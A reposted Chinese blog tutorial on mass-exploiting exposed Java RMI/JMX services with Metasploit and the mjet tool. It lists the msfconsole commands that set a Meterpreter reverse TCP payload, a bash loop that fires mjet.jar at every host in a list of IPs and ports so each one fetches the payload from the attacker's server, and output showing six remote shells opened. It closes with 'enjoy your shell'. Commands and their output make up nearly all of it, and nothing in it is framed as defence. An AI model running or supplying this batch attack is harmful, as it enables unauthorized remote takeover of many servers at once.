利用MSF批量打RMI漏洞

本文轉載自查看原文 2018-02-24 18:19 1263

聲明：不會Java。

參考：https://www.secpulse.com/archives/6203.html

下載mjet，https://github.com/mogwaisec/mjet

按照說明中的步驟：

Copy the "MBean" folder to "data/java/metasploit"
Copy java_mlet_server.rb to "modules/exploits/multi/misc/"

這里有個坑，metasploit默認目錄里沒有data/java/這個目錄，需要手動創建一下，而且里面缺少Payload.class這個類，find命令找一下，因為每個人的這個class位置都可能不一樣。然后把它拷進/data/java/metasploit/下

啟動msf監聽，選擇剛才導入的那個模塊

 1 msf > use exploit/multi/misc/java_mlet_server
 2 msf exploit(multi/misc/java_mlet_server) > set payload java/meterpreter/reverse_tcp
 3 payload => java/meterpreter/reverse_tcp
 4 msf exploit(multi/misc/java_mlet_server) > set LHOST 1.1.1.1
 5 LHOST => 1.1.1.1
 6 msf exploit(multi/misc/java_mlet_server) > set LPORT 4444
 7 LPORT => 4444
 8 msf exploit(multi/misc/java_mlet_server) > set URIPATH /bobac/
 9 URIPATH => /bobac/
10 msf exploit(multi/misc/java_mlet_server) > run
11 [*] Started reverse TCP handler on 1.1.1.1:4444
12 [*] Using URL: http://0.0.0.0:8080/bobac/
13 [*] Local IP: http://1.1.1.1:8080/bobac/
14 [*] Server started.

然后用下載的mjet.jar讓遠程主機主動連接我的服務器，批量利用可以寫一個shell腳本。

1 #!/bin/bash
2 function getip(){
3 while read i
4 do
5     timeout 2s java -jar mjet.jar -u http://1.1.1.1:8080/bobac/ -t `echo $i|awk '{print $1}'` -p `echo $i|awk '{print $2}'`
6 done < rmi-ip.txt
7 }
8 getip

rmi-ip.txt是存放的ip與端口文件，直接執行。msf監聽到並且直接獲取會話session。

 1 msf exploit(multi/misc/java_mlet_server) >
 2 [*] x.x.x.x java_mlet_server - handling request for /bobac/
 3 [*] Sending stage (53859 bytes) to x.x.x.x
 4 [*] Meterpreter session 3 opened (x.x.x.x:4444 -> x.x.x.x:33477) at 2018-02-24 17:38:05 +0800
 5 [*] x.x.x.x java_mlet_server - handling request for /bobac/
 6 [*] Sending stage (53859 bytes) to x.x.x.x
 7 [*] Meterpreter session 4 opened (x.x.x.x:4444 -> x.x.x.x:33486) at 2018-02-24 17:38:08 +0800
 8 [*] x.x.x.x java_mlet_server - handling request for /bobac/
 9 [*] Sending stage (53859 bytes) to x.x.x.x
10 [*] Meterpreter session 5 opened (x.x.x.x:4444 -> x.x.x.x:19321) at 2018-02-24 17:38:22 +0800
11 [*] x.x.x.x java_mlet_server - handling request for /bobac/
12 [*] x.x.x.x java_mlet_server - handling request for /bobac/
13 [*] x.x.x.x java_mlet_server - handling request for /bobac/nhUsuayJ.jar
14 [*] Sending stage (53859 bytes) to x.x.x.x
15 [*] Meterpreter session 6 opened (x.x.x.x:4444 -> x.x.x.x:56411) at 2018-02-24 17:40:53 +0800

6個，sessions -i 找一個進去

--enjoy your shell :)

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 MSF利用永恆之藍漏洞 Kali之msf簡單的漏洞利用 Jmx Rmi Rce 漏洞利用復現&分析使用msf查詢補丁和可利用提權漏洞 cs配合msf批量探測內網MS17-010漏洞 Docker環境復現利用Redis未授權訪問漏洞 >> 批量掃描檢測利用漏洞利用-FTP漏洞利用 Java RMI 服務遠程方法調用漏洞加固從ysoserial講RMI/JRMP反序列化漏洞 ThinkPHP 漏洞利用